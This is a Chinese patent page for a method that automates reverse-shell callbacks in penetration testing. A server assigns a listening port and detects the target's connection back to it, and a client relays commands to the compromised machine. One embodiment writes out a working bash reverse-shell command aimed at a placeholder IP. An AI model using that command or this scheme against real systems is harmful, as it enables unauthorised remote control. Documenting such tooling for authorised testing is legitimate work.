CN114640545B - 机器权限获取方法、装置、存储介质及电子设备 - Google Patents
机器权限获取方法、装置、存储介质及电子设备 Download PDFInfo
- Publication number
- CN114640545B CN114640545B CN202210498803.9A CN202210498803A CN114640545B CN 114640545 B CN114640545 B CN 114640545B CN 202210498803 A CN202210498803 A CN 202210498803A CN 114640545 B CN114640545 B CN 114640545B
- Authority
- CN
- China
- Prior art keywords
- server
- target
- client
- target machine
- machine
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/08—Network architectures or network communication protocols for network security for authentication of entities
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/12—Protocols specially adapted for proprietary or special-purpose networking environments, e.g. medical networks, sensor networks, networks in vehicles or remote metering networks
- H04L67/125—Protocols specially adapted for proprietary or special-purpose networking environments, e.g. medical networks, sensor networks, networks in vehicles or remote metering networks involving control of end-device applications over a network
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/14—Session management
- H04L67/141—Setup of application sessions
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computing Systems (AREA)
- Health & Medical Sciences (AREA)
- General Health & Medical Sciences (AREA)
- Medical Informatics (AREA)
- Computer Hardware Design (AREA)
- Computer Security & Cryptography (AREA)
- General Engineering & Computer Science (AREA)
- Computer And Data Communications (AREA)
Abstract
本公开涉及一种机器权限获取方法、装置、存储介质及电子设备,属于传输与IP领域,所述方法包括:响应于接收到客户端发送的API请求,确定目标端口号;将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器;监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器;在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。有效地提高了权限获取的效率,降低了人力成本。
Description
技术领域
本公开涉及传输与IP领域,具体地,涉及一种机器权限获取方法、装置、存储介质及电子设备。
背景技术
在相关技术中,采用反向连接获取目标机器的权限,测试人员需要有一台公网服务器或者虚拟专用服务器(VPS,Virtual Private Server),借助netcat等工具,在VPS上监听用户指定的端口,等待目标机器反连回来,实现控制,以上流程需要一台VPS,用户需手动输入监听命令,之后再对目标机器进行控制。
发明内容
为了解决相关技术中存在的问题,本公开提供一种机器权限获取方法、装置、存储介质及电子设备。
为了实现上述目的,本公开第一方面提供一种机器权限获取方法,应用于服务器,所述方法包括:
响应于接收到客户端发送的API请求,确定目标端口号;
将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器;
监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器;
在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。
可选地,所述方法还包括:
在确定获取所述目标机器的权限成功的情况下,若接收到所述客户端发送的针对所述目标机器的操作命令,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
可选地,所述API请求是所述客户端根据浏览器界面中用户填写的信息确定的;和/或,
所述操作指令是所述客户端根据浏览器界面中用户填写的信息确定的。
可选地,所述方法包括:
接收预先编写的代码模块;
响应于接收到第二命令行,根据所述第二命令行执行所述代码模块,以启用所述目标服务,所述目标服务包括DNSLOG模块、HTTPLOG模块、LDAP模块或反弹Shell模块中的至少一种。
本公开第二方面提供一种机器权限获取方法,应用于客户端,所述方法包括:
向服务器发送API请求,以使得所述服务器确定目标端口号;
响应于接收到服务器发送的目标端口号,生成第一命令行并发送至目标机器;
响应于接收到回连成功通知,确定获取所述目标机器的权限成功;
其中,所述回连成功通知是通过所述服务器监控所述目标端口号,在确定所述目标机器反向连接至所述服务器的情况下发送的。
可选地,所述方法包括:
向所述服务器发送针对所述目标机器的操作命令,令所述目标服务器在确定获取所述目标机器的权限成功的情况下,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
本公开第三方面提供一种机器权限获取装置,应用于服务器,所述装置包括:
第一确定模块,用于响应于接收到客户端发送的API请求,确定目标端口号;
第一发送模块,用于将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器;
监控模块,用于监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器;
第二发送模块,用于在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。
本公开第四方面提供一种机器权限获取装置,应用于客户端,所述装置包括:
第三发送模块,用于向服务器发送API请求,以使得所述服务器确定目标端口号;
第四发送模块,用于响应于接收到服务器发送的目标端口号,生成第一命令行并发送至目标机器;
第三确定模块,用于响应于接收到回连成功通知,确定获取所述目标机器的权限成功;
其中,所述回连成功通知是通过所述服务器监控所述目标端口号,在确定所述目标机器反向连接至所述服务器的情况下发送的。
本公开第五方面提供一种非临时性计算机可读存储介质,其上存储有计算机程序,该程序被处理器执行时实现第一方面中任一项所述方法的步骤,或本公开第二方面中任一项所述方法的步骤。
本公开第六方面一种电子设备,包括:
存储器,其上存储有计算机程序;
处理器,用于执行所述存储器中的所述计算机程序,以实现本公开第一方面中任一项所述方法的步骤,或本公开第二方面中任一项所述方法的步骤。
通过上述技术方案,通过配置服务器提供API接口以供客户端申请端口监听,无需借助nc等第三方工具即可完成整个反弹流程,在目标机器成功的反向连接至该服务器后,通过生成回连成功通知该客户端,以供后续操作,实现了自动化的开启监听端口,以获取目标机器的权限,从而完善流程,有效地提高了权限获取的效率,降低了人力成本。
本公开的其他特征和优点将在随后的具体实施方式部分予以详细说明。
附图说明
附图是用来提供对本公开的进一步理解,并且构成说明书的一部分,与下面的具体实施方式一起用于解释本公开,但并不构成对本公开的限制。在附图中:
图1是根据一示例性实施例示出的一种机器权限获取方法的流程图;
图2是根据一示例性实施例示出的一种机器权限获取方法的另一流程图;
图3是根据一示例性实施例示出的一种机器权限获取方法的实施场景的示意图;
图4是根据一示例性实施例示出的一种机器权限获取方法的交互图;
图5是根据一示例性实施例示出的一种机器权限获取装置的框图;
图6是根据一示例性实施例示出的一种机器权限获取方法的另一框图;
图7是根据一示例性实施例示出的一种电子设备的框图;
图8是根据一示例性实施例示出的一种电子设备的另一框图。
具体实施方式
以下结合附图对本公开的具体实施方式进行详细说明。应当理解的是,此处所描述的具体实施方式仅用于说明和解释本公开,并不用于限制本公开。
需要说明的是,本公开中所有获取信号、信息或数据的动作都是在遵照所在地国家相应的数据保护法规政策的前提下,并获得由相应装置所有者给予授权的情况下进行的。
对本公开实施例进行进一步详细说明之前,对本公开实施例中涉及的名词和术语进行说明,本发明实施例中涉及的名词和术语适用于如下的解释。
1)响应于,用于表示所执行的操作所依赖的条件或者状态,当满足所依赖的条件或状态时,所执行的一个或多个操作可以是实时的,也可以具有设定的延迟;在没有特别说明的情况下,所执行的多个操作不存在执行先后顺序的限制。
2)反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。
3)正向连接木马的连接过程为,控制端首先发起通信连接的请求,然后木马被控制端响应并建立半连接,等控制端响应后,木马被控制端最终建立一个与控制端的通信连接。平时大多数使用ssh命令是控制端主机主动连接受控端主机,通过这个连接控制端主机可以主动的向受控端主机发送一些请求,这称为正向连接。然而,但是正向连接常常受限于以下几种情况:目标机器因防火墙受限,目标机器只能发送请求,不能接收请求;目标机器端口被占用;目标机器位于局域网,或IP会动态变化,无法直接连接,等等。
4)反向连接,则是指受控端主机主动连接控制端主机,通过这个连接控制端主机可以主动的向受控端主机发送一些请求。
在相关技术中,采用反向连接获取目标机器的权限,测试人员需要有一台公网服务器或者虚拟专用服务器(VPS,Virtual Private Server),借助netcat等工具,在VPS上监听用户指定的端口,等待目标机器反连回来,实现控制,以上流程需要一台VPS,用户需手动输入监听命令,之后再对目标机器进行控制。上述流程可以表示为使用第三方工具连接VPS-->使用nc监听-->对扫出的目标机器执行反弹命令-->等待目标回连-->回连成功,获取目标机器权限。通过上述流程我们可以发现,相关技术中存在反向连接需要技术人员手动操作,效率较低的问题。
图1是根据一示例性实施例示出的一种机器权限获取方法的流程图,应用于服务器,该服务器可以是一公网服务器或者虚拟专用服务器,如图2所示,所述方法包括:
S101、响应于接收到客户端发送的API(Application Programming Interface,应用程序编程接口)请求,确定目标端口号。
其中,该客户端可以被提供为手机、计算机、平板电脑等具有数据处理能力的多种类型的设备,也可以被称作扫描仪。应理解的是,该API请求可以是通过该服务器预先配置的API接口接收的,该API请求可以用于向该服务器申请监听一个端口。
S102、将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器。
示例地,该目标端口号可以是5555,若该服务器的公网IP地址为11.11.11.11,则该第一命令行可以是# bash -i < /dev/tcp/11.11.11.11/5555 0>&1。
S103、监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器。
S104、在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。
应理解的是,本公开实施例提供的技术方案仅用于进行目标机器的漏洞测试。该目标机器可以是指目标IP端口。本领域技术人员应知悉,若目标机器存在相应的漏洞,并执行客户端发送的第一命令行之后,则会反弹到该命令行对应的服务器并建立连接,实现反向连接。
在本公开实施例中,通过配置服务器提供API接口以供客户端申请端口监听,无需借助nc等第三方工具即可完成整个反弹流程,在目标机器成功的反向连接至该服务器后,通过生成回连成功通知该客户端,以供后续操作,实现了自动化的开启监听端口,以获取目标机器的权限,从而完善流程,有效地提高了权限获取的效率,降低了人力成本。
在一些可选地实施例中,所述方法还包括:
在确定获取所述目标机器的权限成功的情况下,若接收到所述客户端发送的针对所述目标机器的操作命令,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
其中,客户端发送的针对目标机器的操作命令可以是通过该服务器提供的API接口实现的。
采用本方案,在目标机器的权限获取成功后,用户能够直接通过客户端发送操作指令,并由该服务器进行转发,无需用户借助第三方工具先连接至服务器,有效地提高了操作效率。
在又一些可选地实施例中,
所述API请求是所述客户端根据浏览器界面中用户填写的信息确定的;和/或,
所述操作指令是所述客户端根据浏览器界面中用户填写的信息确定的。
应理解的是,浏览器在不同的终端设备中受到广泛的支持,用户可以基于该客户端中的浏览器界面进行输入、删减等操作,采用本方案,使得客户端的选择更加多样化,便捷化,并且,能够使得用户能够直接在客户端上对目标机器进行管理,无需对服务器进行访问。
在另一些可选地实施例中,所述方法包括:
接收预先编写的代码模块;
响应于接收到第二命令行,根据所述第二命令行执行所述代码模块,以启用所述目标服务,所述目标服务包括DNSLOG模块、HTTPLOG模块、LDAP模块或反弹Shell模块中的至少一种。
具体地,可以将预先编写的代码上传到该服务器,直接通过命令行执行该代码即可启动若干服务,以完成该服务器的预先配置,进而使得该服务器能够用于执行前述方法中的步骤。所述若干服务可以包括DNSLOG模块、HTTPLOG模块、LDAP模块、反弹Shell模块等等,各个服务模块可以用于实现不同的功能以满足该服务器的功能需求,例如,DNSlog服务可以用于储存在DNS上的域名相关的信息,记录域名或者IP的访问信息;LDAP模块可以用于通过IP协议提供访问控制和维护分布式信息的目录信息,等等。其中,配置完成后的服务器可以被称作GodServer,用于执行上述方法的步骤。
采用本方案,通过将预先编写的代码软件模块发送至该服务器,并通过命令行控制该服务器运行该代码,进而完成该服务器的预先配置,进而使得该服务器能够对目标端口进行监听,并能够与客户端以及目标机器进行信息交互,从而有效地提高了权限获取的效率,降低了人力成本。
基于相同的发明构思,图2是根据一示例性实施例示出的一种机器权限获取方法的另一流程图,应用于客户端,如图2所示,所述方法包括:
S201、向服务器发送API请求,以使得所述服务器确定目标端口号。
S202、响应于接收到服务器发送的目标端口号,生成第一命令行并发送至目标机器。
S203、响应于接收到回连成功通知,确定获取所述目标机器的权限成功;
其中,所述回连成功通知是通过所述服务器监控所述目标端口号,在确定所述目标机器反向连接至所述服务器的情况下发送的。
可选地,所述方法包括:
向所述服务器发送针对所述目标机器的操作命令,令所述目标服务器在确定获取所述目标机器的权限成功的情况下,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
可选地,所述API请求是所述客户端根据浏览器界面中用户填写的信息确定的;和/或,所述操作指令是所述客户端根据浏览器界面中用户填写的信息确定的。
可选地,所述方法包括:
向所述服务器发送预先编写的代码模块;并,
发送第二命令行,以使得所述服务器根据所述第二命令行执行所述代码模块,以启用所述目标服务,所述目标服务包括DNSLOG模块、HTTPLOG模块、LDAP模块或反弹Shell模块中的至少一种。
在本公开实施例中,客户端通过API接口向服务器申请端口监听,并向目标机器发送命令行,使得无需借助nc等第三方工具即可完成整个反弹流程,在目标机器成功的反向连接至该服务器后,该客户端接收服务器发送的生成回连成功,进而进行后续操作,实现了自动化的开启监听端口,从而完善流程,有效地提高了权限获取的效率,降低了人力成本。
图3是根据一示例性实施例示出的一种机器权限获取方法的实施环境的示意图,如图3所示,该实施环境包括服务器301,客户端302以及目标机器303。服务器301、客户端302以及目标机器303之间通过网络连接。
其中,服务器301可以是一公网服务器或者虚拟专用服务器,客户端302可以被提供为手机、计算机、平板电脑等具有数据处理能力的多种类型的设备,目标机器303可以是服务器,也可以是用户个人终端等,本公开对此不作限定。上述服务器301,客户端302以及目标机器303能够用于进行信息交互,以实现本公开实施例提供的机器权限获取方法。示例地,该服务器301可以用于执行上述图1所示的机器权限获取方法的步骤,该客户端302可以用于执行图2所示的机器权限获取方法的步骤。
基于如图3所示的实施环境的示意图,本公开还提供如图4所示的根据一示例性实施例示出的一种机器权限获取方法的交互图,如图4所示,所述方法包括:
S401、客户端302向服务器301发送API请求;
S402、服务器301 将目标端口号发送至客户端302;
S403、客户端302根据目标端口号生成第一命令行;
S404、客户端302将第一命令行发送至目标机器303;
S405、服务器301对目标端口号对应的端口进行监听;
S406、目标机器303根据第一命令行,主动反向连接服务器301;
S407、服务器301生成回连成功通知;
S408、服务器301将回连成功通知发送至客户端302;
S409、客户端302向服务器301发送操作指令;
S410、服务器301将操作指令发送至目标机器303;
S411、目标机器303执行该操作指令。
基于相同的发明构思,图5是根据一示例性实施例示出的一种机器权限获取装置50的框图,应用于服务器,如图5所示,所述装置50包括:
第一确定模块51,用于响应于接收到客户端发送的API请求,确定目标端口号;
第一发送模块52,用于将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器;
监控模块53,用于监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器;
第二发送模块54,用于在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。
可选地,所述装置50还包括:
转发模块,用于在确定获取所述目标机器的权限成功的情况下,若接收到所述客户端发送的针对所述目标机器的操作命令,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
可选地,所述API请求是所述客户端根据浏览器界面中用户填写的信息确定的;和/或,所述操作指令是所述客户端根据浏览器界面中用户填写的信息确定的。
可选地,所述装置50包括:
接收模块,用于接收预先编写的代码模块;
执行模块,用于响应于接收到第二命令行,根据所述第二命令行执行所述代码模块,以启用所述目标服务,所述目标服务包括DNSLOG模块、HTTPLOG模块、LDAP模块或反弹Shell模块中的至少一种。
图6是根据一示例性实施例示出的一种机器权限获取装置60的框图,应用于客户端,如图6所示,所述装置包括:
第三发送模块61,用于向服务器发送API请求,以使得所述服务器确定目标端口号;
第四发送模块62,用于响应于接收到服务器发送的目标端口号,生成第一命令行并发送至目标机器;
第三确定模块63,用于响应于接收到回连成功通知,确定获取所述目标机器的权限成功;
其中,所述回连成功通知是通过所述服务器监控所述目标端口号,在确定所述目标机器反向连接至所述服务器的情况下发送的。
可选地,所述装置60包括:
第五发送模块,用于向所述服务器发送针对所述目标机器的操作命令,令所述目标服务器在确定获取所述目标机器的权限成功的情况下,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
可选地,所述API请求是所述客户端根据浏览器界面中用户填写的信息确定的;和/或,所述操作指令是所述客户端根据浏览器界面中用户填写的信息确定的。
可选地,所述装置60还包括:
第六发送模块,用于向所述服务器发送预先编写的代码模块;
第七发送模块,用于发送第二命令行,以使得所述服务器根据所述第二命令行执行所述代码模块,以启用所述目标服务,所述目标服务包括DNSLOG模块、HTTPLOG模块、LDAP模块或反弹Shell模块中的至少一种。
关于上述实施例中的装置,其中各个模块执行操作的具体方式已经在有关该方法的实施例中进行了详细描述,此处将不做详细阐述说明。
图7是根据一示例性实施例示出的一种电子设备700的框图。如图7所示,该电子设备700可以包括:处理器701,存储器702。该电子设备700还可以包括多媒体组件703,输入/输出(I/O)接口704,以及通信组件705中的一者或多者。
其中,处理器701用于控制该电子设备700的整体操作,以完成上述的机器权限获取方法中的全部或部分步骤。存储器702用于存储各种类型的数据以支持在该电子设备700的操作,这些数据例如可以包括用于在该电子设备700上操作的任何应用程序或方法的指令,以及应用程序相关的数据,例如联系人数据、收发的消息、图片、音频、视频等等。该存储器702可以由任何类型的易失性或非易失性存储设备或者它们的组合实现,例如静态随机存取存储器(Static Random Access Memory,简称SRAM),电可擦除可编程只读存储器(Electrically Erasable Programmable Read-Only Memory,简称EEPROM),可擦除可编程只读存储器(Erasable Programmable Read-Only Memory,简称EPROM),可编程只读存储器(Programmable Read-Only Memory,简称PROM),只读存储器(Read-Only Memory,简称ROM),磁存储器,快闪存储器,磁盘或光盘。多媒体组件703可以包括屏幕和音频组件。其中屏幕例如可以是触摸屏,音频组件用于输出和/或输入音频信号。例如,音频组件可以包括一个麦克风,麦克风用于接收外部音频信号。所接收的音频信号可以被进一步存储在存储器702或通过通信组件705发送。音频组件还包括至少一个扬声器,用于输出音频信号。I/O接口704为处理器701和其他接口模块之间提供接口,上述其他接口模块可以是键盘,鼠标,按钮等。这些按钮可以是虚拟按钮或者实体按钮。通信组件705用于该电子设备700与其他设备之间进行有线或无线通信。无线通信,例如Wi-Fi,蓝牙,近场通信(Near FieldCommunication,简称NFC),2G、3G、4G、NB-IOT、eMTC、或其他5G等等,或它们中的一种或几种的组合,在此不做限定。因此相应的该通信组件705可以包括:Wi-Fi模块,蓝牙模块,NFC模块等等。
在一示例性实施例中,电子设备700可以被一个或多个应用专用集成电路(Application Specific Integrated Circuit,简称ASIC)、数字信号处理器(DigitalSignal Processor,简称DSP)、数字信号处理设备(Digital Signal Processing Device,简称DSPD)、可编程逻辑器件(Programmable Logic Device,简称PLD)、现场可编程门阵列(Field Programmable Gate Array,简称FPGA)、控制器、微控制器、微处理器或其他电子元件实现,用于执行上述的机器权限获取方法。
在另一示例性实施例中,还提供了一种包括程序指令的计算机可读存储介质,该程序指令被处理器执行时实现上述的机器权限获取方法的步骤。例如,该计算机可读存储介质可以为上述包括程序指令的存储器702,上述程序指令可由电子设备700的处理器701执行以完成上述的机器权限获取方法。
图8是根据一示例性实施例示出的一种电子设备800的框图。例如,电子设备800可以被提供为一服务器。参照图8,电子设备800包括处理器822,其数量可以为一个或多个,以及存储器832,用于存储可由处理器822执行的计算机程序。存储器832中存储的计算机程序可以包括一个或一个以上的每一个对应于一组指令的模块。此外,处理器822可以被配置为执行该计算机程序,以执行上述的机器权限获取方法。
另外,电子设备800还可以包括电源组件826和通信组件850,该电源组件826可以被配置为执行电子设备800的电源管理,该通信组件850可以被配置为实现电子设备800的通信,例如,有线或无线通信。此外,该电子设备800还可以包括输入/输出(I/O)接口858。电子设备800可以操作基于存储在存储器832的操作系统,例如Windows ServerTM,Mac OSXTM,UnixTM,LinuxTM等等。
在另一示例性实施例中,还提供了一种包括程序指令的计算机可读存储介质,该程序指令被处理器执行时实现上述的机器权限获取方法的步骤。例如,该非临时性计算机可读存储介质可以为上述包括程序指令的存储器832,上述程序指令可由电子设备800的处理器822执行以完成上述的机器权限获取方法。
在另一示例性实施例中,还提供一种计算机程序产品,该计算机程序产品包含能够由可编程的装置执行的计算机程序,该计算机程序具有当由该可编程的装置执行时用于执行上述的机器权限获取方法的代码部分。
以上结合附图详细描述了本公开的优选实施方式,但是,本公开并不限于上述实施方式中的具体细节,在本公开的技术构思范围内,可以对本公开的技术方案进行多种简单变型,这些简单变型均属于本公开的保护范围。
另外需要说明的是,在上述具体实施方式中所描述的各个具体技术特征,在不矛盾的情况下,可以通过任何合适的方式进行组合,为了避免不必要的重复,本公开对各种可能的组合方式不再另行说明。
此外,本公开的各种不同的实施方式之间也可以进行任意组合,只要其不违背本公开的思想,其同样应当视为本公开所公开的内容。
Claims (10)
1.一种机器权限获取方法,其特征在于,应用于服务器,所述方法包括:
响应于接收到客户端发送的API请求,确定目标端口号;
将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器;
监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器;
在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。
2.根据权利要求1所述的方法,其特征在于,所述方法还包括:
在确定获取所述目标机器的权限成功的情况下,若接收到所述客户端发送的针对所述目标机器的操作命令,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
3.根据权利要求2所述的方法,其特征在于,
所述API请求是所述客户端根据浏览器界面中用户填写的信息确定的;和/或,
所述操作命令是所述客户端根据浏览器界面中用户填写的信息确定的。
4.根据权利要求1-3中任一项所述的方法,其特征在于,所述方法包括:
接收预先编写的代码模块;
响应于接收到第二命令行,根据所述第二命令行执行所述代码模块,以启用目标服务,所述目标服务包括DNSLOG模块、HTTPLOG模块、LDAP模块或反弹Shell模块中的至少一种。
5.一种机器权限获取方法,其特征在于,应用于客户端,所述方法包括:
向服务器发送API请求,以使得所述服务器确定目标端口号;
响应于接收到服务器发送的目标端口号,生成第一命令行并发送至目标机器;
所述客户端响应于接收到回连成功通知,确定获取所述目标机器的权限成功;
其中,所述回连成功通知是通过所述服务器监控所述目标端口号,在确定所述目标机器反向连接至所述服务器的情况下由所述服务器发送的。
6.根据权利要求5所述的方法,其特征在于,所述方法包括:
向所述服务器发送针对所述目标机器的操作命令,令所述服务器在确定获取所述目标机器的权限成功的情况下,将所述操作命令转发至所述目标机器,以使得所述目标机器执行所述操作命令。
7.一种机器权限获取装置,其特征在于,应用于服务器,所述装置包括:
第一确定模块,用于响应于接收到客户端发送的API请求,确定目标端口号;
第一发送模块,用于将所述目标端口号发送至所述客户端,以使得所述客户端根据所述端口号生成第一命令行并发送至目标机器;
监控模块,用于监控所述目标端口号,确定所述目标机器是否反向连接至所述服务器;
第二发送模块,用于在确定所述目标机器反向连接至所述服务器的情况下,确定获取所述目标机器的权限成功,并生成回连成功通知,并将所述回连成功通知发送至所述客户端。
8.一种机器权限获取装置,其特征在于,应用于客户端,所述装置包括:
第三发送模块,用于向服务器发送API请求,以使得所述服务器确定目标端口号;
第四发送模块,用于响应于接收到服务器发送的目标端口号,生成第一命令行并发送至目标机器;
第三确定模块,用于响应于接收到回连成功通知,确定获取所述目标机器的权限成功;
其中,所述回连成功通知是通过所述服务器监控所述目标端口号,在确定所述目标机器反向连接至所述服务器的情况下由所述服务器发送的。
9.一种非临时性计算机可读存储介质,其上存储有计算机程序,其特征在于,该程序被处理器执行时实现权利要求1-4中任一项所述方法的步骤,或权利要求5-6中任一项所述方法的步骤。
10.一种电子设备,其特征在于,包括:
存储器,其上存储有计算机程序;
处理器,用于执行所述存储器中的所述计算机程序,以实现权利要求1-4中任一项所述方法的步骤,或权利要求5-6中任一项所述方法的步骤。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210498803.9A CN114640545B (zh) | 2022-05-09 | 2022-05-09 | 机器权限获取方法、装置、存储介质及电子设备 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN202210498803.9A CN114640545B (zh) | 2022-05-09 | 2022-05-09 | 机器权限获取方法、装置、存储介质及电子设备 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN114640545A CN114640545A (zh) | 2022-06-17 |
| CN114640545B true CN114640545B (zh) | 2022-08-19 |
Family
ID=81953127
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202210498803.9A Active CN114640545B (zh) | 2022-05-09 | 2022-05-09 | 机器权限获取方法、装置、存储介质及电子设备 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN114640545B (zh) |
Family Cites Families (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| RO131252A2 (ro) * | 2014-11-27 | 2016-06-30 | Ixia, A California Corporation | Metode, sisteme şi suport citibil pe calculator pentru recepţionarea informaţiilor de configurare a testărilor |
| CN109448345A (zh) * | 2018-02-11 | 2019-03-08 | 国网浙江省电力公司丽水供电公司 | 一种跨网络跨平台监控告警管理装置及方法 |
| CN111371897B (zh) * | 2020-03-12 | 2022-10-04 | 深圳市共进电子股份有限公司 | 一种基于组网系统的反向连接方法、装置及存储介质 |
| CN112039905B (zh) * | 2020-09-03 | 2023-04-28 | 杭州安恒信息技术股份有限公司 | 基于反向连接的网络通信方法、装置及电子设备和介质 |
| CN113596033B (zh) * | 2021-07-30 | 2023-03-24 | 深信服科技股份有限公司 | 访问控制方法及装置、设备、存储介质 |
| CN113935028A (zh) * | 2021-11-12 | 2022-01-14 | 绿盟科技集团股份有限公司 | 一种攻击行为识别的方法及装置 |
-
2022
- 2022-05-09 CN CN202210498803.9A patent/CN114640545B/zh active Active
Also Published As
| Publication number | Publication date |
|---|---|
| CN114640545A (zh) | 2022-06-17 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| AU2021277736B2 (en) | Pdu type setting method, ue policy setting method, and related entity | |
| KR101802264B1 (ko) | 복수의 단말에 의해 가상 sim 카드를 공유하기 위한 방법, 단말, 서버, 및 시스템 | |
| CN110311929B (zh) | 一种访问控制方法、装置及电子设备和存储介质 | |
| CN109587254B (zh) | 云服务器访问方法、装置、云服务器及存储介质 | |
| US20180124051A1 (en) | Response Method and System in Virtual Network Computing Authentication, and Proxy Server | |
| US20080003996A1 (en) | Controlling mobile messaging remotely | |
| US20180091581A1 (en) | Method of switching download mode, control method thereof and control system thereof | |
| GB2482268A (en) | Mobile terminal and peer-to-peer mode based data transmission method thereof | |
| CN110177128B (zh) | 数据传输系统及其建立vpn连接的方法、终端、vpn代理 | |
| US10367894B2 (en) | Information processing apparatus, method for controlling the same, non-transitory computer-readable storage medium, and information processing system | |
| WO2015065210A1 (en) | Secure mobile access to resources within a private network | |
| US20110213843A1 (en) | System and method for providing access to a service relating to an account for an electronic device in a network | |
| EP2974159B1 (en) | Method, device and system for voice communication | |
| CN104539508A (zh) | 访问控制方法和装置 | |
| CN113595927A (zh) | 一种旁路模式下镜像流量的处理方法和装置 | |
| US20140378116A1 (en) | Method And System For Sending Notification Message, Management Control Apparatus, And Terminal Device | |
| CN114640545B (zh) | 机器权限获取方法、装置、存储介质及电子设备 | |
| CN109995811B (zh) | 一种ios系统的网络切换方法及系统 | |
| US11057241B2 (en) | Network interworking method, network element, and system | |
| CA2731659C (en) | System and method for providing access to a service relating to an account for an electronic device in a network | |
| CN112398718A (zh) | 一种网络传输方法、装置、电子设备及存储介质 | |
| JP6728745B2 (ja) | サーバおよびシステム | |
| CN115776665B (zh) | Vn组配置方法、装置、设备及存储介质 | |
| JP2007272717A (ja) | 情報管理装置およびその方法 | |
| WO2022007510A1 (zh) | 数字证书获取方法及装置 |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |